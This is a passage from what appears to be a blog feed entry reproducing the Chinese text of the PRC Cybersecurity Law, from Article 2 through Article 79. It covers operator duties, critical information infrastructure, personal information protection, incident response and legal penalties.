在中华人民共和国境内建设、运营、维护和使用网络，以及网络安全的监督管理，适用本法。</p><p>第三条 国家坚持网络安全与信息化发展并重，遵循积极利用、科学发展、依法管理、确保安全的方针，推进网络基础设施建设和互联互通，鼓励网络技术创新和应用，支持培养网络安全人才，建立健全网络安全保障体系，提高网络安全保护能力。</p><p>第四条 国家制定并不断完善网络安全战略，明确保障网络安全的基本要求和主要目标，提出重点领域的网络安全政策、工作任务和措施。</p><p>第五条 国家采取措施，监测、防御、处置来源于中华人民共和国境内外的网络安全风险和威胁，保护关键信息基础设施免受攻击、侵入、干扰和破坏，依法惩治网络违法犯罪活动，维护网络空间安全和秩序。</p><p>第六条 国家倡导诚实守信、健康文明的网络行为，推动传播社会主义核心价值观，采取措施提高全社会的网络安全意识和水平，形成全社会共同参与促进网络安全的良好环境。</p><p>第七条 国家积极开展网络空间治理、网络技术研发和标准制定、打击网络违法犯罪等方面的国际交流与合作，推动构建和平、安全、开放、合作的网络空间，建立多边、民主、透明的网络治理体系。</p><p>第八条 国家网信部门负责统筹协调网络安全工作和相关监督管理工作。国务院电信主管部门、公安部门和其他有关机关依照本法和有关法律、行政法规的规定，在各自职责范围内负责网络安全保护和监督管理工作。</p><p>县级以上地方人民政府有关部门的网络安全保护和监督管理职责，按照国家有关规定确定。</p><p>第九条 网络运营者开展经营和服务活动，必须遵守法律、行政法规，尊重社会公德，遵守商业道德，诚实信用，履行网络安全保护义务，接受政府和社会的监督，承担社会责任。</p><p>第十条 建设、运营网络或者通过网络提供服务，应当依照法律、行政法规的规定和国家标准的强制性要求，采取技术措施和其他必要措施，保障网络安全、稳定运行，有效应对网络安全事件，防范网络违法犯罪活动，维护网络数据的完整性、保密性和可用性。</p><p>第十一条 网络相关行业组织按照章程，加强行业自律，制定网络安全行为规范，指导会员加强网络安全保护，提高网络安全保护水平，促进行业健康发展。</p><p>第十二条 国家保护公民、法人和其他组织依法使用网络的权利，促进网络接入普及，提升网络服务水平，为社会提供安全、便利的网络服务，保障网络信息依法有序自由流动。</p><p>任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益，煽动颠覆国家政权、推翻社会主义制度，煽动分裂国家、破坏国家统一，宣扬恐怖主义、极端主义，宣扬民族仇恨、民族歧视，传播暴力、淫秽色情信息，编造、传播虚假信息扰乱经济秩序和社会秩序，以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。</p><p>第十三条 国家支持研究开发有利于未成年人健康成长的网络产品和服务，依法惩治利用网络从事危害未成年人身心健康的活动，为未成年人提供安全、健康的网络环境。</p><p>第十四条 任何个人和组织有权对危害网络安全的行为向网信、电信、公安等部门举报。收到举报的部门应当及时依法作出处理；不属于本部门职责的，应当及时移送有权处理的部门。</p><p>有关部门应当对举报人的相关信息予以保密，保护举报人的合法权益。</p><h2 id="第二章-网络安全支持与促进"><a href="#第二章-网络安全支持与促进" class="headerlink" title="第二章 网络安全支持与促进"></a><strong>第二章 网络安全支持与促进</strong></h2><p>第十五条 国家建立和完善网络安全标准体系。国务院标准化行政主管部门和国务院其他有关部门根据各自的职责，组织制定并适时修订有关网络安全管理以及网络产品、服务和运行安全的国家标准、行业标准。</p><p>国家支持企业、研究机构、高等学校、网络相关行业组织参与网络安全国家标准、行业标准的制定。</p><p>第十六条 国务院和省、自治区、直辖市人民政府应当统筹规划，加大投入，扶持重点网络安全技术产业和项目，支持网络安全技术的研究开发和应用，推广安全可信的网络产品和服务，保护网络技术知识产权，支持企业、研究机构和高等学校等参与国家网络安全技术创新项目。</p><p>第十七条 国家推进网络安全社会化服务体系建设，鼓励有关企业、机构开展网络安全认证、检测和风险评估等安全服务。</p><p>第十八条 国家鼓励开发网络数据安全保护和利用技术，促进公共数据资源开放，推动技术创新和经济社会发展。</p><p>国家支持创新网络安全管理方式，运用网络新技术，提升网络安全保护水平。</p><p>第十九条 各级人民政府及其有关部门应当组织开展经常性的网络安全宣传教育，并指导、督促有关单位做好网络安全宣传教育工作。</p><p>大众传播媒介应当有针对性地面向社会进行网络安全宣传教育。</p><p>第二十条 国家支持企业和高等学校、职业学校等教育培训机构开展网络安全相关教育与培训，采取多种方式培养网络安全人才，促进网络安全人才交流。</p><h2 id="第三章-网络运行安全"><a href="#第三章-网络运行安全" class="headerlink" title="第三章 网络运行安全"></a><strong>第三章 网络运行安全</strong></h2><p>第一节 一般规定</p><p>第二十一条 国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求，履行下列安全保护义务，保障网络免受干扰、破坏或者未经授权的访问，防止网络数据泄露或者被窃取、篡改：</p><p>（一）制定内部安全管理制度和操作规程，确定网络安全负责人，落实网络安全保护责任；</p><p>（二）采取防范计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施；</p><p>（三）采取监测、记录网络运行状态、网络安全事件的技术措施，并按照规定留存相关的网络日志不少于六个月；</p><p>（四）采取数据分类、重要数据备份和加密等措施；</p><p>（五）法律、行政法规规定的其他义务。</p><p>第二十二条 网络产品、服务应当符合相关国家标准的强制性要求。网络产品、服务的提供者不得设置恶意程序；发现其网络产品、服务存在安全缺陷、漏洞等风险时，应当立即采取补救措施，按照规定及时告知用户并向有关主管部门报告。</p><p>网络产品、服务的提供者应当为其产品、服务持续提供安全维护；在规定或者当事人约定的期限内，不得终止提供安全维护。</p><p>网络产品、服务具有收集用户信息功能的，其提供者应当向用户明示并取得同意；涉及用户个人信息的，还应当遵守本法和有关法律、行政法规关于个人信息保护的规定。</p><p>第二十三条 网络关键设备和网络安全专用产品应当按照相关国家标准的强制性要求，由具备资格的机构安全认证合格或者安全检测符合要求后，方可销售或者提供。国家网信部门会同国务院有关部门制定、公布网络关键设备和网络安全专用产品目录，并推动安全认证和安全检测结果互认，避免重复认证、检测。</p><p>第二十四条 网络运营者为用户办理网络接入、域名注册服务，办理固定电话、移动电话等入网手续，或者为用户提供信息发布、即时通讯等服务，在与用户签订协议或者确认提供服务时，应当要求用户提供真实身份信息。用户不提供真实身份信息的，网络运营者不得为其提供相关服务。</p><p>国家实施网络可信身份战略，支持研究开发安全、方便的电子身份认证技术，推动不同电子身份认证之间的互认。</p><p>第二十五条 网络运营者应当制定网络安全事件应急预案，及时处置系统漏洞、计算机病毒、网络攻击、网络侵入等安全风险；在发生危害网络安全的事件时，立即启动应急预案，采取相应的补救措施，并按照规定向有关主管部门报告。</p><p>第二十六条 开展网络安全认证、检测、风险评估等活动，向社会发布系统漏洞、计算机病毒、网络攻击、网络侵入等网络安全信息，应当遵守国家有关规定。</p><p>第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。</p><p>第二十八条 网络运营者应当为公安机关、国家安全机关依法维护国家安全和侦查犯罪的活动提供技术支持和协助。</p><p>第二十九条 国家支持网络运营者之间在网络安全信息收集、分析、通报和应急处置等方面进行合作，提高网络运营者的安全保障能力。</p><p>有关行业组织建立健全本行业的网络安全保护规范和协作机制，加强对网络安全风险的分析评估，定期向会员进行风险警示，支持、协助会员应对网络安全风险。</p><p>第三十条 网信部门和有关部门在履行网络安全保护职责中获取的信息，只能用于维护网络安全的需要，不得用于其他用途。</p><p>第二节 关键信息基础设施的运行安全</p><p>第三十一条 国家对公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务等重要行业和领域，以及其他一旦遭到破坏、丧失功能或者数据泄露，可能严重危害国家安全、国计民生、公共利益的关键信息基础设施，在网络安全等级保护制度的基础上，实行重点保护。关键信息基础设施的具体范围和安全保护办法由国务院制定。</p><p>国家鼓励关键信息基础设施以外的网络运营者自愿参与关键信息基础设施保护体系。</p><p>第三十二条 按照国务院规定的职责分工，负责关键信息基础设施安全保护工作的部门分别编制并组织实施本行业、本领域的关键信息基础设施安全规划，指导和监督关键信息基础设施运行安全保护工作。</p><p>第三十三条 建设关键信息基础设施应当确保其具有支持业务稳定、持续运行的性能，并保证安全技术措施同步规划、同步建设、同步使用。</p><p>第三十四条 除本法第二十一条的规定外，关键信息基础设施的运营者还应当履行下列安全保护义务：</p><p>（一）设置专门安全管理机构和安全管理负责人，并对该负责人和关键岗位的人员进行安全背景审查；</p><p>（二）定期对从业人员进行网络安全教育、技术培训和技能考核；</p><p>（三）对重要系统和数据库进行容灾备份；</p><p>（四）制定网络安全事件应急预案，并定期进行演练；</p><p>（五）法律、行政法规规定的其他义务。</p><p>第三十五条 关键信息基础设施的运营者采购网络产品和服务，可能影响国家安全的，应当通过国家网信部门会同国务院有关部门组织的国家安全审查。</p><p>第三十六条 关键信息基础设施的运营者采购网络产品和服务，应当按照规定与提供者签订安全保密协议，明确安全和保密义务与责任。</p><p>第三十七条 关键信息基础设施的运营者在中华人民共和国境内运营中收集和产生的个人信息和重要数据应当在境内存储。因业务需要，确需向境外提供的，应当按照国家网信部门会同国务院有关部门制定的办法进行安全评估；法律、行政法规另有规定的，依照其规定。</p><p>第三十八条 关键信息基础设施的运营者应当自行或者委托网络安全服务机构对其网络的安全性和可能存在的风险每年至少进行一次检测评估，并将检测评估情况和改进措施报送相关负责关键信息基础设施安全保护工作的部门。</p><p>第三十九条 国家网信部门应当统筹协调有关部门对关键信息基础设施的安全保护采取下列措施：</p><p>（一）对关键信息基础设施的安全风险进行抽查检测，提出改进措施，必要时可以委托网络安全服务机构对网络存在的安全风险进行检测评估；</p><p>（二）定期组织关键信息基础设施的运营者进行网络安全应急演练，提高应对网络安全事件的水平和协同配合能力；</p><p>（三）促进有关部门、关键信息基础设施的运营者以及有关研究机构、网络安全服务机构等之间的网络安全信息共享；</p><p>（四）对网络安全事件的应急处置与网络功能的恢复等，提供技术支持和协助。</p><h2 id="第四章-网络信息安全"><a href="#第四章-网络信息安全" class="headerlink" title="第四章 网络信息安全"></a><strong>第四章 网络信息安全</strong></h2><p>第四十条 网络运营者应当对其收集的用户信息严格保密，并建立健全用户信息保护制度。</p><p>第四十一条 网络运营者收集、使用个人信息，应当遵循合法、正当、必要的原则，公开收集、使用规则，明示收集、使用信息的目的、方式和范围，并经被收集者同意。</p><p>网络运营者不得收集与其提供的服务无关的个人信息，不得违反法律、行政法规的规定和双方的约定收集、使用个人信息，并应当依照法律、行政法规的规定和与用户的约定，处理其保存的个人信息。</p><p>第四十二条 网络运营者不得泄露、篡改、毁损其收集的个人信息；未经被收集者同意，不得向他人提供个人信息。但是，经过处理无法识别特定个人且不能复原的除外。</p><p>网络运营者应当采取技术措施和其他必要措施，确保其收集的个人信息安全，防止信息泄露、毁损、丢失。在发生或者可能发生个人信息泄露、毁损、丢失的情况时，应当立即采取补救措施，按照规定及时告知用户并向有关主管部门报告。</p><p>第四十三条 个人发现网络运营者违反法律、行政法规的规定或者双方的约定收集、使用其个人信息的，有权要求网络运营者删除其个人信息；发现网络运营者收集、存储的其个人信息有错误的，有权要求网络运营者予以更正。网络运营者应当采取措施予以删除或者更正。</p><p>第四十四条 任何个人和组织不得窃取或者以其他非法方式获取个人信息，不得非法出售或者非法向他人提供个人信息。</p><p>第四十五条 依法负有网络安全监督管理职责的部门及其工作人员，必须对在履行职责中知悉的个人信息、隐私和商业秘密严格保密，不得泄露、出售或者非法向他人提供。</p><p>第四十六条 任何个人和组织应当对其使用网络的行为负责，不得设立用于实施诈骗，传授犯罪方法，制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组，不得利用网络发布涉及实施诈骗，制作或者销售违禁物品、管制物品以及其他违法犯罪活动的信息。</p><p>第四十七条 网络运营者应当加强对其用户发布的信息的管理，发现法律、行政法规禁止发布或者传输的信息的，应当立即停止传输该信息，采取消除等处置措施，防止信息扩散，保存有关记录，并向有关主管部门报告。</p><p>第四十八条 任何个人和组织发送的电子信息、提供的应用软件，不得设置恶意程序，不得含有法律、行政法规禁止发布或者传输的信息。</p><p>电子信息发送服务提供者和应用软件下载服务提供者，应当履行安全管理义务，知道其用户有前款规定行为的，应当停止提供服务，采取消除等处置措施，保存有关记录，并向有关主管部门报告。</p><p>第四十九条 网络运营者应当建立网络信息安全投诉、举报制度，公布投诉、举报方式等信息，及时受理并处理有关网络信息安全的投诉和举报。</p><p>网络运营者对网信部门和有关部门依法实施的监督检查，应当予以配合。</p><p>第五十条 国家网信部门和有关部门依法履行网络信息安全监督管理职责，发现法律、行政法规禁止发布或者传输的信息的，应当要求网络运营者停止传输，采取消除等处置措施，保存有关记录；对来源于中华人民共和国境外的上述信息，应当通知有关机构采取技术措施和其他必要措施阻断传播。</p><h2 id="第五章-监测预警与应急处置"><a href="#第五章-监测预警与应急处置" class="headerlink" title="第五章 监测预警与应急处置"></a><strong>第五章 监测预警与应急处置</strong></h2><p>第五十一条 国家建立网络安全监测预警和信息通报制度。国家网信部门应当统筹协调有关部门加强网络安全信息收集、分析和通报工作，按照规定统一发布网络安全监测预警信息。</p><p>第五十二条 负责关键信息基础设施安全保护工作的部门，应当建立健全本行业、本领域的网络安全监测预警和信息通报制度，并按照规定报送网络安全监测预警信息。</p><p>第五十三条 国家网信部门协调有关部门建立健全网络安全风险评估和应急工作机制，制定网络安全事件应急预案，并定期组织演练。</p><p>负责关键信息基础设施安全保护工作的部门应当制定本行业、本领域的网络安全事件应急预案，并定期组织演练。</p><p>网络安全事件应急预案应当按照事件发生后的危害程度、影响范围等因素对网络安全事件进行分级，并规定相应的应急处置措施。</p><p>第五十四条 网络安全事件发生的风险增大时，省级以上人民政府有关部门应当按照规定的权限和程序，并根据网络安全风险的特点和可能造成的危害，采取下列措施：</p><p>（一）要求有关部门、机构和人员及时收集、报告有关信息，加强对网络安全风险的监测；</p><p>（二）组织有关部门、机构和专业人员，对网络安全风险信息进行分析评估，预测事件发生的可能性、影响范围和危害程度；</p><p>（三）向社会发布网络安全风险预警，发布避免、减轻危害的措施。</p><p>第五十五条 发生网络安全事件，应当立即启动网络安全事件应急预案，对网络安全事件进行调查和评估，要求网络运营者采取技术措施和其他必要措施，消除安全隐患，防止危害扩大，并及时向社会发布与公众有关的警示信息。</p><p>第五十六条 省级以上人民政府有关部门在履行网络安全监督管理职责中，发现网络存在较大安全风险或者发生安全事件的，可以按照规定的权限和程序对该网络的运营者的法定代表人或者主要负责人进行约谈。网络运营者应当按照要求采取措施，进行整改，消除隐患。</p><p>第五十七条 因网络安全事件，发生突发事件或者生产安全事故的，应当依照《中华人民共和国突发事件应对法》、《中华人民共和国安全生产法》等有关法律、行政法规的规定处置。</p><p>第五十八条 因维护国家安全和社会公共秩序，处置重大突发社会安全事件的需要，经国务院决定或者批准，可以在特定区域对网络通信采取限制等临时措施。</p><h2 id="第六章-法律责任"><a href="#第六章-法律责任" class="headerlink" title="第六章 法律责任"></a><strong>第六章 法律责任</strong></h2><p>第五十九条 网络运营者不履行本法第二十一条、第二十五条规定的网络安全保护义务的，由有关主管部门责令改正，给予警告；拒不改正或者导致危害网络安全等后果的，处一万元以上十万元以下罚款，对直接负责的主管人员处五千元以上五万元以下罚款。</p><p>关键信息基础设施的运营者不履行本法第三十三条、第三十四条、第三十六条、第三十八条规定的网络安全保护义务的，由有关主管部门责令改正，给予警告；拒不改正或者导致危害网络安全等后果的，处十万元以上一百万元以下罚款，对直接负责的主管人员处一万元以上十万元以下罚款。</p><p>第六十条 违反本法第二十二条第一款、第二款和第四十八条第一款规定，有下列行为之一的，由有关主管部门责令改正，给予警告；拒不改正或者导致危害网络安全等后果的，处五万元以上五十万元以下罚款，对直接负责的主管人员处一万元以上十万元以下罚款：</p><p>（一）设置恶意程序的；</p><p>（二）对其产品、服务存在的安全缺陷、漏洞等风险未立即采取补救措施，或者未按照规定及时告知用户并向有关主管部门报告的；</p><p>（三）擅自终止为其产品、服务提供安全维护的。</p><p>第六十一条 网络运营者违反本法第二十四条第一款规定，未要求用户提供真实身份信息，或者对不提供真实身份信息的用户提供相关服务的，由有关主管部门责令改正；拒不改正或者情节严重的，处五万元以上五十万元以下罚款，并可以由有关主管部门责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照，对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。</p><p>第六十二条 违反本法第二十六条规定，开展网络安全认证、检测、风险评估等活动，或者向社会发布系统漏洞、计算机病毒、网络攻击、网络侵入等网络安全信息的，由有关主管部门责令改正，给予警告；拒不改正或者情节严重的，处一万元以上十万元以下罚款，并可以由有关主管部门责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照，对直接负责的主管人员和其他直接责任人员处五千元以上五万元以下罚款。</p><p>第六十三条 违反本法第二十七条规定，从事危害网络安全的活动，或者提供专门用于从事危害网络安全活动的程序、工具，或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助，尚不构成犯罪的，由公安机关没收违法所得，处五日以下拘留，可以并处五万元以上五十万元以下罚款；情节较重的，处五日以上十五日以下拘留，可以并处十万元以上一百万元以下罚款。</p><p>单位有前款行为的，由公安机关没收违法所得，处十万元以上一百万元以下罚款，并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。</p><p>违反本法第二十七条规定，受到治安管理处罚的人员，五年内不得从事网络安全管理和网络运营关键岗位的工作；受到刑事处罚的人员，终身不得从事网络安全管理和网络运营关键岗位的工作。</p><p>第六十四条 网络运营者、网络产品或者服务的提供者违反本法第二十二条第三款、第四十一条至第四十三条规定，侵害个人信息依法得到保护的权利的，由有关主管部门责令改正，可以根据情节单处或者并处警告、没收违法所得、处违法所得一倍以上十倍以下罚款，没有违法所得的，处一百万元以下罚款，对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款；情节严重的，并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照。</p><p>违反本法第四十四条规定，窃取或者以其他非法方式获取、非法出售或者非法向他人提供个人信息，尚不构成犯罪的，由公安机关没收违法所得，并处违法所得一倍以上十倍以下罚款，没有违法所得的，处一百万元以下罚款。</p><p>第六十五条 关键信息基础设施的运营者违反本法第三十五条规定，使用未经安全审查或者安全审查未通过的网络产品或者服务的，由有关主管部门责令停止使用，处采购金额一倍以上十倍以下罚款；对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。</p><p>第六十六条 关键信息基础设施的运营者违反本法第三十七条规定，在境外存储网络数据，或者向境外提供网络数据的，由有关主管部门责令改正，给予警告，没收违法所得，处五万元以上五十万元以下罚款，并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照；对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。</p><p>第六十七条 违反本法第四十六条规定，设立用于实施违法犯罪活动的网站、通讯群组，或者利用网络发布涉及实施违法犯罪活动的信息，尚不构成犯罪的，由公安机关处五日以下拘留，可以并处一万元以上十万元以下罚款；情节较重的，处五日以上十五日以下拘留，可以并处五万元以上五十万元以下罚款。关闭用于实施违法犯罪活动的网站、通讯群组。</p><p>单位有前款行为的，由公安机关处十万元以上五十万元以下罚款，并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。</p><p>第六十八条 网络运营者违反本法第四十七条规定，对法律、行政法规禁止发布或者传输的信息未停止传输、采取消除等处置措施、保存有关记录的，由有关主管部门责令改正，给予警告，没收违法所得；拒不改正或者情节严重的，处十万元以上五十万元以下罚款，并可以责令暂停相关业务、停业整顿、关闭网站、吊销相关业务许可证或者吊销营业执照，对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。</p><p>电子信息发送服务提供者、应用软件下载服务提供者，不履行本法第四十八条第二款规定的安全管理义务的，依照前款规定处罚。</p><p>第六十九条 网络运营者违反本法规定，有下列行为之一的，由有关主管部门责令改正；拒不改正或者情节严重的，处五万元以上五十万元以下罚款，对直接负责的主管人员和其他直接责任人员，处一万元以上十万元以下罚款：</p><p>（一）不按照有关部门的要求对法律、行政法规禁止发布或者传输的信息，采取停止传输、消除等处置措施的；</p><p>（二）拒绝、阻碍有关部门依法实施的监督检查的；</p><p>（三）拒不向公安机关、国家安全机关提供技术支持和协助的。</p><p>第七十条 发布或者传输本法第十二条第二款和其他法律、行政法规禁止发布或者传输的信息的，依照有关法律、行政法规的规定处罚。</p><p>第七十一条 有本法规定的违法行为的，依照有关法律、行政法规的规定记入信用档案，并予以公示。</p><p>第七十二条 国家机关政务网络的运营者不履行本法规定的网络安全保护义务的，由其上级机关或者有关机关责令改正；对直接负责的主管人员和其他直接责任人员依法给予处分。</p><p>第七十三条 网信部门和有关部门违反本法第三十条规定，将在履行网络安全保护职责中获取的信息用于其他用途的，对直接负责的主管人员和其他直接责任人员依法给予处分。</p><p>网信部门和有关部门的工作人员玩忽职守、滥用职权、徇私舞弊，尚不构成犯罪的，依法给予处分。</p><p>第七十四条 违反本法规定，给他人造成损害的，依法承担民事责任。</p><p>违反本法规定，构成违反治安管理行为的，依法给予治安管理处罚；构成犯罪的，依法追究刑事责任。</p><p>第七十五条 境外的机构、组织、个人从事攻击、侵入、干扰、破坏等危害中华人民共和国的关键信息基础设施的活动，造成严重后果的，依法追究法律责任；国务院公安部门和有关部门并可以决定对该机构、组织、个人采取冻结财产或者其他必要的制裁措施。</p><h2 id="第七章-附-则"><a href="#第七章-附-则" class="headerlink" title="第七章 附 则"></a><strong>第七章 附 则</strong></h2><p>第七十六条 本法下列用语的含义：</p><p>（一）网络，是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息进行收集、存储、传输、交换、处理的系统。</p><p>（二）网络安全，是指通过采取必要措施，防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故，使网络处于稳定可靠运行的状态，以及保障网络数据的完整性、保密性、可用性的能力。</p><p>（三）网络运营者，是指网络的所有者、管理者和网络服务提供者。</p><p>（四）网络数据，是指通过网络收集、存储、传输、处理和产生的各种电子数据。</p><p>（五）个人信息，是指以电子或者其他方式记录的能够单独或者与其他信息结合识别自然人个人身份的各种信息，包括但不限于自然人的姓名、出生日期、身份证件号码、个人生物识别信息、住址、电话号码等。</p><p>第七十七条 存储、处理涉及国家秘密信息的网络的运行安全保护，除应当遵守本法外，还应当遵守保密法律、行政法规的规定。</p><p>第七十八条 军事网络的安全保护，由中央军事委员会另行规定。</p><p>第七十九条 本法自2017年6月1日起施行。</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;中华人民共和国网络安全法&quot;&gt;&lt;a href=&quot;#中华人民共和国网络安全法&quot; class=&quot;headerlink&quot; title=&quot;中华人民共和国网络安全法&quot;&gt;&lt;/a&gt;中华人民共和国网络安全法&lt;/h1&gt;&lt;p&gt;&lt;strong&gt;（2016年11月7日第十二届全国人民代表大</summary>
      
    
    
    
    <category term="法律法规" scheme="http://example.com/categories/%E6%B3%95%E5%BE%8B%E6%B3%95%E8%A7%84/"/>
    
    
    <category term="法律法规" scheme="http://example.com/tags/%E6%B3%95%E5%BE%8B%E6%B3%95%E8%A7%84/"/>
    
    <category term="中华人民共和国网络安全法" scheme="http://example.com/tags/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/"/>
    
  </entry>
  
</feed>
